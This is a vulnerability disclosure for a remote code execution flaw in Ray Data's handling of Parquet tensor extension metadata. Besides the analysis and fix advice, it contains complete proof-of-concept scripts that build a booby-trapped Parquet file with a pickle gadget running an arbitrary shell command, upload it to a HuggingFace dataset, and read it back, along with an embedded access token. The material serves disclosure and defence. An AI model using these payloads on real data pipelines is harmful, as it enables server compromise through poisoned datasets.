Ray Data CVE-2026-41486
Remote Code Execution via Parquet Arrow Extension Type Deserialization
Summary
Ray Data registers custom Arrow extension types (ray.data.arrow_tensor, ray.data.arrow_tensor_v2, ray.data.arrow_variable_shaped_tensor) globally in PyArrow. When PyArrow reads a Parquet file containing one of these extension types, it calls __arrow_ext_deserialize__ on the field's metadata bytes. Ray's implementation passes these bytes directly to cloudpickle.loads(), achieving arbitrary code execution during schema parsing, before any row data is read.
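The mechanics of such a payload can be sketched with the standard-library pickle module (standing in for cloudpickle; the Trigger class and file path below are illustrative, not Ray code). A __reduce__ gadget runs an arbitrary side effect during loads() while still returning a value shaped like legitimate metadata:

```python
import os
import pickle  # stand-in for cloudpickle in this sketch
import tempfile

proof = os.path.join(tempfile.gettempdir(), "gadget-demo-proof")

class Trigger:
    def __reduce__(self):
        # The eval expression does two things: a side effect (creating a file
        # here; a real payload could call os.system) and a trailing (1,) so
        # the deserialized value still looks like a plausible shape tuple.
        return (eval, (f"(open({proof!r}, 'w').close(), (1,))[1]",))

result = pickle.loads(pickle.dumps(Trigger()))
print(result)                  # (1,) - passes downstream shape expectations
print(os.path.exists(proof))   # True - side effect ran during loads()
```

Because the gadget's return value is a well-formed tuple, downstream consumers that only inspect the deserialized value see nothing unusual.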
In May 2024, Ray fixed a related vulnerability in PyExtensionType-based extension types (issue #41314, PR #45084). In July 2025, PR #54831 introduced cloudpickle.loads() into the replacement extension types' deserialization path, reintroducing the same class of vulnerability.
Note: Source links in this report are pinned to the Ray 2.54.0 release commit (48bd1f8fa4) for stable line references. We also re-verified the same vulnerable code paths on current master as of March 17, 2026.
Details
Extension type registration
Ray Data registers three Arrow extension types globally in PyArrow:
# python/ray/data/_internal/tensor_extensions/arrow.py:1603-1605
pa.register_extension_type(ArrowTensorType((0,), pa.int64()))
pa.register_extension_type(ArrowTensorTypeV2((0,), pa.int64()))
pa.register_extension_type(ArrowVariableShapedTensorType(pa.int64(), 0))

Registration happens at module load time (__init__.py:94-95), and any use of ray.data triggers it. Once registered, PyArrow automatically calls __arrow_ext_deserialize__ whenever it encounters these extension type names in any Parquet file's schema, including files from untrusted sources.
The code path to cloudpickle.loads()
All three extension types inherit from ArrowExtensionSerializeDeserializeCache, whose __arrow_ext_deserialize__ method (arrow.py:176-179) delegates to subclass methods that ultimately call _deserialize_with_fallback():
# python/ray/data/_internal/tensor_extensions/arrow.py:84-96
def _deserialize_with_fallback(serialized: bytes, field_name: str = "data"):
    """Deserialize data with cloudpickle first, fallback to JSON."""
    try:
        # Try cloudpickle first (new format)
        return cloudpickle.loads(serialized)  # <-- arbitrary code execution
    except Exception:
        # Fallback to JSON format (legacy)
        try:
            return json.loads(serialized)
        except json.JSONDecodeError:
            raise ValueError(
                f"Unable to deserialize {field_name} from {type(serialized)}"
            )

The serialized bytes come directly from the Parquet file's field-level metadata (ARROW:extension:metadata) with no validation. cloudpickle.loads() is tried first, so a crafted payload always executes before the safe JSON fallback is reached.
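The ordering problem can be reproduced with only the standard library (pickle standing in for cloudpickle; deserialize_with_fallback below is a simplified model of the pattern, not Ray's actual code):

```python
import json
import os
import pickle  # stand-in for cloudpickle
import tempfile

proof = os.path.join(tempfile.gettempdir(), "fallback-demo-proof")

def deserialize_with_fallback(serialized: bytes):
    # Mirrors the vulnerable ordering: pickle is tried before the safe JSON
    # path, so a pickle payload always executes and the fallback never runs.
    try:
        return pickle.loads(serialized)
    except Exception:
        return json.loads(serialized)

class Trigger:
    def __reduce__(self):
        # Side effect plus a plausible-looking shape list as the return value
        return (eval, (f"(open({proof!r}, 'w').close(), [3, 224, 224])[1]",))

# Legacy JSON metadata still round-trips through the fallback...
assert deserialize_with_fallback(json.dumps([3, 224, 224]).encode()) == [3, 224, 224]

# ...but a crafted payload executes before JSON is ever considered.
shape = deserialize_with_fallback(pickle.dumps(Trigger()))
print(shape, os.path.exists(proof))
```

JSON bytes happen to be rejected by pickle's opcode check, which is why the legacy path still works; a pickle payload, by construction, never reaches it.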
For ArrowTensorType, the call chain is:
__arrow_ext_deserialize__(cls, storage_type, serialized)      # arrow.py:176
  -> _arrow_ext_deserialize_cache(serialized, value_type)     # arrow.py:178
  -> _arrow_ext_deserialize_compute(serialized, value_type)   # arrow.py:652
  -> _deserialize_with_fallback(serialized, "shape")          # arrow.py:653
  -> cloudpickle.loads(serialized)                            # arrow.py:88  <-- RCE

ArrowTensorTypeV2 (arrow.py:679-680) and ArrowVariableShapedTensorType (arrow.py:1076-1077) follow the same pattern.
Why the existing mitigation doesn't help
After issue #41314, Ray added check_for_legacy_tensor_type() in parquet_datasource.py:146-170 to block the old PyExtensionType-based tensor types:
# python/ray/data/_internal/datasource/parquet_datasource.py:146-170
def check_for_legacy_tensor_type(schema):
    """Check for the legacy tensor extension type and raise an error if found.

    Ray Data uses an extension type to represent tensors in Arrow tables. Previously,
    the extension type extended `PyExtensionType`. However, this base type can expose
    users to arbitrary code execution. To prevent this, we don't load the type by
    default.
    """
    for name, type in zip(schema.names, schema.types):
        if isinstance(type, pa.UnknownExtensionType) and isinstance(
            type, pa.PyExtensionType
        ):
            raise RuntimeError(...)

This guard checks for PyExtensionType / UnknownExtensionType. It does not check for the currently registered ray.data.arrow_tensor types, which are the ones that call cloudpickle.loads(). Additionally, the check runs after PyArrow has already deserialized the schema, so even if it matched the current types, the code execution would already have occurred.
Outside Ray's documented threat model
Ray's security documentation states that Ray relies on network isolation and "extensively uses cloudpickle." This vulnerability does not require cluster access. The payload arrives through a Parquet file from cloud storage, a data lake, HuggingFace, or a shared filesystem. A perfectly firewalled Ray cluster is vulnerable if it reads a crafted file.
Impact
- Affected versions: Ray 2.49.0 through 2.54.0 (latest release as of March 2026). The vulnerable _deserialize_with_fallback function with cloudpickle.loads() was introduced in commit f6d21db1a4 (PR #54831, July 2025) and first released in Ray 2.49.0.
- Affected configurations: Any process that uses Ray Data and reads Parquet files. The extension types are registered globally in PyArrow, so all Parquet reads in the process are affected, including ray.data.read_parquet(), pyarrow.parquet.read_table(), pandas.read_parquet(), etc.
- Attacker prerequisites: The attacker must place a crafted Parquet file where a Ray Data pipeline reads it. No authentication or cluster access is required. The Parquet file must contain a column with a ray.data.arrow_tensor (or v2, or variable-shaped) extension type name, which makes this a targeted attack against Ray Data users.
- CIA impact: Arbitrary command execution as the Ray worker process user, resulting in full server compromise.
- Severity: Critical
Attack scenarios
- HuggingFace datasets: Ray's documentation recommends reading Parquet datasets from HuggingFace using ray.data.read_parquet("hf://datasets/...", filesystem=HfFileSystem()). Anyone can create a HuggingFace dataset containing a crafted Parquet file. A tensor column with ray.data.arrow_tensor metadata is normal for an ML dataset, as tensor columns are a core Ray Data feature. We verified this scenario end-to-end with a private HuggingFace dataset (see PoC below).
- Multi-tenant ML platforms: Organizations running shared Ray clusters where multiple teams submit data processing jobs. If one team can write Parquet files to shared storage that another team reads, the writer can execute arbitrary code in the reader's context.
- Compromised data pipelines: An upstream data producer writes Parquet files with crafted tensor column metadata. The payload survives because standard Parquet tools preserve extension metadata transparently.
PoC
We provide two reproductions: a minimal local PoC and a full end-to-end scenario via HuggingFace.
Prerequisites: Python 3.12+ and uv (curl -LsSf https://astral.sh/uv/install.sh | sh).
PoC 1: Local file
Creates a valid Parquet file with a tensor column whose extension metadata contains a crafted cloudpickle payload. Reading the file with Ray Data triggers code execution during schema parsing.
1. Create the Parquet file:
cat > craft_parquet.py << 'SCRIPT'
import cloudpickle
import pyarrow as pa
import pyarrow.parquet as pq

COMMAND = "id > /tmp/ray-tensor-rce-proof"

class Trigger:
    def __reduce__(self):
        return (eval, (f"(__import__('os').system({COMMAND!r}), (1,))[1]",))

storage_type = pa.list_(pa.int64())
schema = pa.schema([
    pa.field("tensor", storage_type, metadata={
        b"ARROW:extension:name": b"ray.data.arrow_tensor",
        b"ARROW:extension:metadata": cloudpickle.dumps(Trigger()),
    }),
    pa.field("id", pa.int64()),
    pa.field("text", pa.string()),
])
table = pa.Table.from_arrays([
    pa.array([[1, 2, 3], [4, 5, 6]], type=storage_type),
    pa.array([1, 2]),
    pa.array(["hello", "world"]),
], schema=schema)
pq.write_table(table, "crafted.parquet")
print("Created crafted.parquet")
SCRIPT
uv run --with 'cloudpickle,pyarrow' python craft_parquet.py

2. Read it with Ray Data:
rm -f /tmp/ray-tensor-rce-proof
uv run --with 'ray[data]' python -c "
import ray.data
ray.data.read_parquet('crafted.parquet')
"
cat /tmp/ray-tensor-rce-proof
# Expected: output of 'id' - confirms code execution

PoC 2: End-to-end via HuggingFace
This demonstrates the realistic attack scenario: a crafted Parquet file hosted as a HuggingFace dataset, read by a Ray cluster following Ray's own documentation.
We uploaded a crafted Parquet file to a private HuggingFace dataset at antiproof/parquet-tensor-disclosure. The file looks like a normal ML dataset with tensor, id, and text columns. The read-only token below gives access.
Upload script (for reference, this is how we seeded the dataset):
cat > upload_dataset.py << 'SCRIPT'
# /// script
# requires-python = ">=3.10"
# dependencies = ["cloudpickle", "pyarrow", "huggingface_hub"]
# ///
"""Upload a crafted Parquet file to a HuggingFace dataset.

Prerequisites: huggingface-cli login (with a write token)
Usage: uv run upload_dataset.py <repo_id> <command>
"""
import sys, tempfile
from pathlib import Path

import cloudpickle, pyarrow as pa, pyarrow.parquet as pq
from huggingface_hub import HfApi

def build_parquet(output, command):
    class Trigger:
        def __reduce__(self):
            return (eval, (f"(__import__('os').system({command!r}), (1,))[1]",))

    storage_type = pa.list_(pa.int64())
    schema = pa.schema([
        pa.field("tensor", storage_type, metadata={
            b"ARROW:extension:name": b"ray.data.arrow_tensor",
            b"ARROW:extension:metadata": cloudpickle.dumps(Trigger()),
        }),
        pa.field("id", pa.int64()),
        pa.field("text", pa.string()),
    ])
    table = pa.Table.from_arrays([
        pa.array([[1, 2, 3], [4, 5, 6]], type=storage_type),
        pa.array([1, 2]),
        pa.array(["hello", "world"]),
    ], schema=schema)
    pq.write_table(table, str(output))

repo_id, command = sys.argv[1], sys.argv[2]
with tempfile.TemporaryDirectory() as tmpdir:
    parquet = Path(tmpdir) / "train.parquet"
    build_parquet(parquet, command)
    HfApi().upload_file(
        path_or_fileobj=str(parquet),
        path_in_repo="data/train.parquet",
        repo_id=repo_id, repo_type="dataset",
    )
print(f"Uploaded to https://huggingface.co/datasets/{repo_id}")
SCRIPT
# We ran:
# uv run upload_dataset.py antiproof/parquet-tensor-disclosure 'id > /tmp/ray-tensor-rce-proof'

Reproduce (reads the dataset from HuggingFace, no local files needed):
rm -f /tmp/ray-tensor-rce-proof
HF_TOKEN=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 \
uv run --with 'ray[data],huggingface_hub' python -c "
import ray.data
from huggingface_hub import HfFileSystem
ray.data.read_parquet(
'hf://datasets/antiproof/parquet-tensor-disclosure/data/train.parquet',
filesystem=HfFileSystem(),
)
"
cat /tmp/ray-tensor-rce-proof
# Expected: output of 'id' - confirms code execution via HuggingFace dataset

The token above is read-only. The dataset is private to prevent unintended exposure.
Suggested fix
The extension metadata stores simple values (a shape tuple like (3, 224, 224) or an ndim integer). These do not require cloudpickle.
- Replace cloudpickle.loads() in _deserialize_with_fallback() with json.loads(). The tensor shape and ndim are JSON-serializable. For backward compatibility with files written using the current cloudpickle format, gate cloudpickle.loads() behind an opt-in environment variable (following the pattern already established with RAY_DATA_AUTOLOAD_PYEXTENSIONTYPE).
- Serialize new extension type metadata as JSON by default. json.dumps([3, 224, 224]) carries the same information as cloudpickle.dumps((3, 224, 224)), without the code execution risk.
- Add a security note to the read_parquet() documentation explaining that Parquet files from untrusted sources can execute arbitrary code when tensor extension types are registered.
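The first two points can be sketched with the standard library (pickle standing in for cloudpickle; the function name and RAY_DATA_ALLOW_PICKLED_TENSOR_METADATA flag below are hypothetical, not Ray's):

```python
import json
import os
import pickle  # stand-in for cloudpickle

def safe_deserialize(serialized: bytes, field_name: str = "data"):
    """Try safe JSON first; allow legacy pickle only behind an explicit opt-in."""
    try:
        return json.loads(serialized)
    except (json.JSONDecodeError, UnicodeDecodeError):
        # Hypothetical opt-in flag, modeled on RAY_DATA_AUTOLOAD_PYEXTENSIONTYPE
        if os.environ.get("RAY_DATA_ALLOW_PICKLED_TENSOR_METADATA") == "1":
            return pickle.loads(serialized)
        raise ValueError(
            f"Refusing to unpickle untrusted {field_name} metadata; "
            "re-write the file with JSON metadata or opt in explicitly."
        )

# New-format metadata is plain JSON and never touches pickle.
assert safe_deserialize(json.dumps([3, 224, 224]).encode()) == [3, 224, 224]

# A pickled payload is rejected unless the operator explicitly opted in.
try:
    safe_deserialize(pickle.dumps((3, 224, 224)))
except ValueError as exc:
    print(exc)
```

Reversing the order matters: JSON parsing cannot execute code, so the dangerous path is only reachable for operators who have knowingly accepted legacy files.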
Please contact [email protected] with any questions about this disclosure policy or related security research.
External POC / Exploit Code
GHSA-mw35-8rx3-xf9r